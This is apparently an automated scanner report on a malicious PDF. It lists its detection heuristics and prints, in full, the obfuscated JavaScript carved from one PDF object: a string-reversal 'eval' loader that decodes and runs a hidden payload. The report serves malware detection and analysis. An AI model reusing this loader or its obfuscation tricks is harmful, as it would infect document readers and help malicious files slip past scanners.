MALICIOUS
106
Risk Score
Machine Learning
- Nyx PDF Classifier malicious score 0.9954
Heuristics 3
-
Hex-obfuscated scripting name object critical PDF_OBFUSCATED_NAME_OBJECTA PDF name object that drives script execution (/JavaScript or /JS) is written with #XX hex escapes to hide it from string-based scanners — e.g. /J#61v#61S#63r#69p#74 decoding to /JavaScript. Legitimate PDF producers always write these names literally; hex-encoding an executable name is a deliberate evasion used by exploit-kit and dropper PDFs.
-
JavaScript action low 1 related finding PDF_JAVASCRIPTPDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
-
Embedded JS stream low PDF_JSPDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
javascript_obj0011_000.js |
pdf-javascript-stream | PDF /JS object 11 at offset 0x1349 | 2325 bytes |
SHA-256: ca838ab153ea9de4fff1e74bdd0848fd720f71bc6fbee4425be234136cd19b41 |
|||
Preview scriptFirst 1,000 lines of the extracted script
var f = null;
try {
var vKB=new String("lengt"+"h");
var lKH="rA"+"t";
var pUL=String("cha");
var zOD=this;
var vIL=50;
var tSD=1;
var bWP=0;
var vUH=/[9\|k7]/g;
function dSJ(lEZ){
this.x=lEZ;
};
var hCP="va|r9 9c|XkM|T7=9tkh7iks7.kxk;7z7=9\'9g7e7t|P7akg|e7N|\'9;9hkQ|Zk=|zk+|\'|tkh7W9o|r|d|\'7;|n|AkN|=9zk+k\'7u7mkW9o7rkd7s9\'k;9p9W7J9=9\'9p|akg9e9N9u|m|\'7;9pkO|V| 9=k 92k374k 7;kjkW7Zk=9\'|\'|;7o7X9CkRk=|\'7j9o9ikn7\'k;7j9O9Jk=|\'|\'9;7b9W|P7=90|;9lkAkR|=|Skt|r7iknkg7;7tkG9X7=|\'|sku|b7s|tkr9\'7;|rkA|R|=|\'7e7v9akl|\'|;9v7K|Bk=7\'klke|n|gkt9h7\'7;|f|I|N|=9\'k\\7\\|xk\'k;kvkQ|R9=9\'9tko|S7tkr9i9n9g|\'7;9rkQkZ9=k\'7p|a7r9s|ekIkn7t7\'7;|lkO7P|=9\'kf9r7o|m9C|h7a9r|C7o|dke|\'k;kz7UkP7=9\'kc7h|a9r|C9o9d|e9A9t|\'9;7t7S9D9=747/94|;9xkQ9Bk=k1|+k4|;9z7EkB9=72k070k+k595|;|zkO9D7=7\'|d|o|ck\'|;|t7M9Z7=93k3k2|;kl7W7Hk=|[k]7;|fkC9V9=|\'7\'9;|r9G9PkMk=k1k6k;7j7K7H|=|29;7t|M|R|=k4k;7p|Y9Vk=|c9X9M9T7[9nkA|N9]k(|c9X7M9T9[|p7W|J|]9)|;kf9o9rk(9z7I|R7=7b|W7Pk;9z9I7R9<9 |pkY7Vk;7 7z9I9R9+|+9)k{9vka7r| |xkM|F9=|ckX9MkT7[9h9Q7Zk]k(9ckXkMkTk[7pkWkJ9]7,7z9IkR9,|t7rku7e|)7;7j9O9J9=9[7j9O7Jk,7xkM|Fk]9[7o|X|C9R|]9(|jkWkZk)7;9;7}7fko7r|(|zkI|R9=90|;kz|I7Rk |<k |j9O|J9[9vkK|Bk]9;| |z|IkR7+7=9j9K9H9)k{|j7OkJ|C|=kj|O9J|[9t7GkX7]k(|z|I|R9,9jkK|Hk)7;kf9AkX9=|pkakrks7ekI7n|t9(|j7O|J9C|,7rkGkPkMk)k;7fkI|V7=|fkAkX9^kp9O9Vk;9d7Y7D9=7f|I7V|.7t|o|S|t9r|ikn|g|(7rkG|P|M|)9;|d7Y7D7=k(9d9Y9D9[7v9K9B7]|=k=kt7S9D|)7 |?9 |\'|07\'7 9+k 9dkY|D| 9:7 9d7Y7D9;7l9WkHk.9p|u9s7h7(|d7Y|D9)9;|}kt|r9y| |{7f7CkV|=7n7e9w| 7S9t9rki9nkg|(7f|I9N| 7+| 9l7W9H7[9o9X7C9Rk]|(kf7I9N9)9)9;ka9p7pk[kr|A7Rk]k(|\'|f|CkV|=9\"|\'k+kf9CkV9+9\'k\"7;7\'7)k;9c7X9MkT|.9vkW|B9=9(kf|C|Vk[kt9G|X7]k(9f9CkV9[kv|K7B7]k-7t9MkZk)7)k;9c9X9M|T7.|r9Q|T9=k(7f7C|V|[7t7GkX|]9(kbkWkP|,7f9C|V7[|vkK9B9]|-7t7M7Z7)7)9;kr|Q7L|(k)|;7}9 kc9a7tkc|h9(kn|IkN7)9{|ikf9(7ckX|M|T9.9r7Q|T|)k{|tkrky| 7{ka7p|p7[7r9A|R7]9(|c9X|M|T9.|r9QkT|)|;9}7 9ckaktkc|hk(7nkIkN|)|{k}7}| |e7l|s7e| k{9}9}9";
app.rOD=function(nOV){
nCB='';
var dMZ = pUL + lKH;
for(zIR=nOV[vKB];zIR >= 0;zIR--){
nCB+=nOV[dMZ](zIR);
}
return nCB;
}
var rOD=app.rOD;
rAR=rOD(String("lav"+"e"));
tYR = app.rOD('epytotorp');
hCP=hCP.replace(vUH, '');
dSJ.prototype={
bOT : function(pOJ){
if(pOJ > vIL){
this.x[rAR](hCP);
} else {
f.bOT(pOJ+tSD);
}
},
};
var f=new dSJ(zOD);
f.bOT(bWP);
} catch(fCV){
app.alert(fCV);
}
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.